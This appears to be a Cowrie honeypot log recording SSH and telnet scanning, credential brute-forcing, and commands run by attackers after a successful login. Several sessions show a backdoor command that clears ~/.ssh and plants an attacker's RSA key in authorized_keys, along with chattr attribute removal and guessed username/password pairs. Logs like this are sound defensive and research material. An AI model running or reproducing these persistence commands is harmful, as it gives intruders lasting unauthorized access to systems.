{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47643,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e87fccc05e4","protocol":"telnet","message":"New connection: 212.227.125.160:47643 (1.2.3.4:23) [session: 9e87fccc05e4]","sensor":"my-vps","timestamp":"2025-09-09T04:15:57.172749Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:57.189978Z","src_ip":"51.81.118.153","session":"e4d882f15eb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:15:57.520445Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:15:57.521372Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:15:57.522829Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:57.798881Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:15:58.437329Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:15:58.437990Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:15:58.707098Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:58.707939Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":55938,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a3feea3fb2f","protocol":"ssh","message":"New connection: 103.59.95.12:55938 (1.2.3.4:22) [session: 5a3feea3fb2f]","sensor":"my-vps","timestamp":"2025-09-09T04:15:58.986285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:15:58.987027Z","src_ip":"103.59.95.12","session":"5a3feea3fb2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:15:59.262003Z","src_ip":"103.59.95.12","session":"5a3feea3fb2f"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":35104,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ed979b068ee","protocol":"ssh","message":"New connection: 192.210.135.20:35104 (1.2.3.4:22) [session: 6ed979b068ee]","sensor":"my-vps","timestamp":"2025-09-09T04:16:00.041526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:00.042226Z","src_ip":"192.210.135.20","session":"6ed979b068ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:00.151878Z","src_ip":"192.210.135.20","session":"6ed979b068ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:00.408387Z","src_ip":"103.59.95.12","session":"5a3feea3fb2f"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"hunter1234","message":"login attempt [hunter/hunter1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:00.633619Z","src_ip":"192.210.135.20","session":"6ed979b068ee"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:01.691613Z","src_ip":"103.59.95.12","session":"5a3feea3fb2f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:01.744673Z","src_ip":"192.210.135.20","session":"6ed979b068ee"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":55944,"dst_ip":"1.2.3.4","dst_port":22,"session":"c14d1a75ba92","protocol":"ssh","message":"New connection: 103.59.95.12:55944 (1.2.3.4:22) [session: c14d1a75ba92]","sensor":"my-vps","timestamp":"2025-09-09T04:16:01.955157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:01.955958Z","src_ip":"103.59.95.12","session":"c14d1a75ba92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:02.219890Z","src_ip":"103.59.95.12","session":"c14d1a75ba92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.317814Z","src_ip":"103.59.95.12","session":"c14d1a75ba92"}
{"eventid":"cowrie.session.closed","duration":10.167567014694214,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.544219Z","src_ip":"212.227.235.229","session":"59a39e1c03ed"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.575775Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.581817Z","src_ip":"103.59.95.12","session":"c14d1a75ba92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33710,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8c6abe78163","protocol":"telnet","message":"New connection: 212.227.235.229:33710 (1.2.3.4:23) [session: d8c6abe78163]","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.714094Z"}
{"eventid":"cowrie.session.closed","duration":0.1793193817138672,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:03.893346Z","src_ip":"212.227.235.229","session":"d8c6abe78163"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":33230,"dst_ip":"1.2.3.4","dst_port":22,"session":"afb17629fa2d","protocol":"ssh","message":"New connection: 211.22.25.164:33230 (1.2.3.4:22) [session: afb17629fa2d]","sensor":"my-vps","timestamp":"2025-09-09T04:16:05.313753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:05.314411Z","src_ip":"211.22.25.164","session":"afb17629fa2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:05.554718Z","src_ip":"211.22.25.164","session":"afb17629fa2d"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache@123","message":"login attempt [apache/apache@123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:06.553427Z","src_ip":"211.22.25.164","session":"afb17629fa2d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:07.794996Z","src_ip":"211.22.25.164","session":"afb17629fa2d"}
{"eventid":"cowrie.session.connect","src_ip":"20.65.194.48","src_port":32954,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ec8b00b645b","protocol":"telnet","message":"New connection: 20.65.194.48:32954 (1.2.3.4:23) [session: 7ec8b00b645b]","sensor":"my-vps","timestamp":"2025-09-09T04:16:09.836334Z"}
{"eventid":"cowrie.session.closed","duration":14.08477258682251,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:10.329767Z","src_ip":"212.227.125.160","session":"a728c2f3b28b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47843,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bb9309ca916","protocol":"telnet","message":"New connection: 212.227.125.160:47843 (1.2.3.4:23) [session: 6bb9309ca916]","sensor":"my-vps","timestamp":"2025-09-09T04:16:10.559365Z"}
{"eventid":"cowrie.session.closed","duration":14.007691860198975,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:11.180367Z","src_ip":"212.227.125.160","session":"9e87fccc05e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47852,"dst_ip":"1.2.3.4","dst_port":23,"session":"164f3f2189e3","protocol":"telnet","message":"New connection: 212.227.125.160:47852 (1.2.3.4:23) [session: 164f3f2189e3]","sensor":"my-vps","timestamp":"2025-09-09T04:16:11.412415Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":43577,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40b5ae5cccb","protocol":"ssh","message":"New connection: 154.209.4.55:43577 (1.2.3.4:22) [session: c40b5ae5cccb]","sensor":"my-vps","timestamp":"2025-09-09T04:16:17.729909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:17.735048Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:17.941361Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:16:18.750790Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:16:19.224258Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:16:19.224970Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:16:19.225981Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:19.430748Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:16:19.857881Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:16:19.858862Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.session.closed","duration":10.13697624206543,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:19.973248Z","src_ip":"20.65.194.48","session":"7ec8b00b645b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.064342Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.065167Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.session.connect","src_ip":"20.65.194.48","src_port":39454,"dst_ip":"1.2.3.4","dst_port":23,"session":"2483389eb1fc","protocol":"telnet","message":"New connection: 20.65.194.48:39454 (1.2.3.4:23) [session: 2483389eb1fc]","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.107428Z"}
{"eventid":"cowrie.session.closed","duration":0.14531660079956055,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.252686Z","src_ip":"20.65.194.48","session":"2483389eb1fc"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":44017,"dst_ip":"1.2.3.4","dst_port":22,"session":"50379408cea2","protocol":"ssh","message":"New connection: 154.209.4.55:44017 (1.2.3.4:22) [session: 50379408cea2]","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.254705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.255427Z","src_ip":"154.209.4.55","session":"50379408cea2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:20.464188Z","src_ip":"154.209.4.55","session":"50379408cea2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:21.294969Z","src_ip":"154.209.4.55","session":"50379408cea2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:22.501378Z","src_ip":"154.209.4.55","session":"50379408cea2"}
